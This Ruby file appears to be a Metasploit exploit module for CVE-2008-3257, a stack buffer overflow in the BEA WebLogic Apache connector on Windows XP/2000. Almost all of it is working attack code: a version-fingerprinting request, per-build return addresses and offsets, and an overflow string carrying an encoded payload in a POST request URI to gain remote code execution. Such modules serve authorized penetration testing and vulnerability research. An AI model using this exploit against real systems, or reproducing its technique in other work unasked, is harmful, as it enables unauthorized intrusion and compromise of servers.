Path: blob/master/modules/exploits/windows/http/bea_weblogic_post_bof.rb
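##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :pattern => [ /Apache/ ] }

  include Msf::Exploit::Remote::HttpClient

  # Known mod_wl_20.so builds, keyed by the version label that
  # fingerprint_mod_wl reports and that get_target matches on.  A build is
  # only identified when BOTH the build timestamp and the change number
  # appear in the Weblogic Bridge Message page; matching on one alone would
  # mis-identify a build.
  KNOWN_BUILDS = {
    'BEA WebLogic 8.1 SP6 - mod_wl_20.so' => [
      /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/,
      /Change Number:<\/B> <I>779586/
    ],
    'BEA WebLogic 8.1 SP5 - mod_wl_20.so' => [
      /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/,
      /Change Number:<\/B> <I>616810/
    ],
    'BEA WebLogic 8.1 SP4 - mod_wl_20.so' => [
      /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/,
      /Change Number:<\/B> <I>452998/
    ]
  }.freeze

  # Any build stamped on or before this date is reported as vulnerable when
  # the exact build is not in KNOWN_BUILDS (see fingerprint_mod_wl).
  PATCH_RELEASE_DATE = 'Jul 28 2008'

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack based buffer overflow in the BEA
        Weblogic Apache plugin.

          The connector fails to properly handle specially crafted HTTP POST
        requests, resulting a buffer overflow due to the insecure usage
        of sprintf. Currently, this module works over Windows systems without DEP,
        and has been tested with Windows 2000 / XP.

          In addition, the Weblogic Apache plugin version is fingerprinted with a POST
        request containing a specially crafted Transfer-Encoding header.
      },
      'Author'         =>
        [
          'KingCope', # Vulnerability Discovery and PoC
          'juan vazquez', # Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2008-3257' ],
          [ 'OSVDB', '47096' ],
          [ 'BID', '30273' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged'     => true,
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'    => 4000,
          'BadChars' => "\x00\x0d\x0a\x3f"
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
            {
              'Ret'    => 0x10061f63, # push esp # ret # mod_wl_20.so
              'Offset' => 4102
            }
          ],
          [ 'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
            {
              'Ret'    => 0x10061473, # push esp # ret # mod_wl_20.so
              'Offset' => 4102
            }
          ],
          [ 'BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
            {
              'Ret'    => 0x10020e31, # push esp # ret # mod_wl_20.so
              'Offset' => 4102
            }
          ]
        ],
      'DisclosureDate' => '2008-07-17',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path to a jsp or object provided by Weblogic', '/index.jsp']),
      ])
  end

  # Maps the fingerprint string from fingerprint_mod_wl onto a CheckCode.
  #
  # Every string fingerprint_mod_wl can return is handled explicitly; the
  # "not vulnerable" string used to be matched against /no vulnerable/, which
  # never matched, so a patched connector fell through the case and check
  # returned nil instead of Safe.  Anything unexpected now yields Unknown
  # rather than nil.
  #
  # @return [Exploit::CheckCode]
  def check
    fingerprint = fingerprint_mod_wl
    print_status "#{rhost}:#{rport} - #{fingerprint}"

    case fingerprint
    when /Version found/, /BEA WebLogic connector vulnerable/
      Exploit::CheckCode::Appears
    when /BEA WebLogic connector undefined/
      Exploit::CheckCode::Detected
    when /BEA WebLogic connector not vulnerable/, /BEA WebLogic connector not found/
      Exploit::CheckCode::Safe
    else
      Exploit::CheckCode::Unknown
    end
  end

  def exploit
    # Autodetect BEA mod_wl version
    my_target = get_target

    # Avoid the attack if the victim doesn't have the same setup we're targeting
    if my_target.nil?
      print_error("BEA mod_weblogic not supported")
      return
    end

    uri = normalize_uri(target_uri.path)
    sploit = rand_text_alphanumeric(my_target['Offset'] - uri.length)
    sploit << [my_target.ret].pack("V")
    sploit << payload.encoded

    send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri} #{sploit}",
    })

    handler
  end

  # Resolves the selected target, fingerprinting the connector when the
  # 'Automatic' target is chosen.
  #
  # The indexes below correspond to the order of the 'Targets' array in
  # initialize (index 0 is 'Automatic'); keep them in sync if that array
  # is reordered.
  #
  # @return [Msf::Module::Target, nil] nil when the fingerprint does not
  #   match a supported build
  def get_target
    return target if target.name != 'Automatic'

    fingerprint = fingerprint_mod_wl

    case fingerprint
    when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/
      targets[1]
    when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/
      targets[2]
    when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/
      targets[3]
    else
      nil
    end
  end

  # Fingerprints the Weblogic Apache connector from the "Weblogic Bridge
  # Message" error page it returns for a POST with a malformed
  # Transfer-Encoding header.
  #
  # Exact builds are identified through KNOWN_BUILDS; otherwise the first
  # "Mon dd yyyy" date in the page is compared against PATCH_RELEASE_DATE.
  # A date that the regex accepts but Date.parse rejects (e.g. an impossible
  # day) is reported as "undefined" instead of raising out of check.
  #
  # @return [String] one of the fingerprint strings consumed by check and
  #   get_target
  def fingerprint_mod_wl
    my_data = rand_text_alpha(rand(5) + 8)
    res = send_request_cgi(
      {
        'method'  => 'POST',
        'uri'     => normalize_uri(target_uri.path),
        'headers' =>
          {
            'Transfer-Encoding' => my_data
          },
        'data'    => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
      })

    return "BEA WebLogic connector not found" unless res && res.code == 200 && res.body =~ /Weblogic Bridge Message/

    body = res.body

    # Both the build timestamp and the change number have to be present.
    KNOWN_BUILDS.each do |version, patterns|
      return "Version found: #{version}" if patterns.all? { |re| body =~ re }
    end

    # Check for dates prior to patch release
    match = body.match(/([A-Za-z]{3} [\s\d]{2} [\d]{4})/)
    return "BEA WebLogic connector undefined" unless match

    build_date = Date.parse(match[1])
    if build_date <= Date.parse(PATCH_RELEASE_DATE)
      "BEA WebLogic connector vulnerable"
    else
      "BEA WebLogic connector not vulnerable"
    end
  rescue ArgumentError
    # Date::Error < ArgumentError: the captured text was not a real date.
    "BEA WebLogic connector undefined"
  end
end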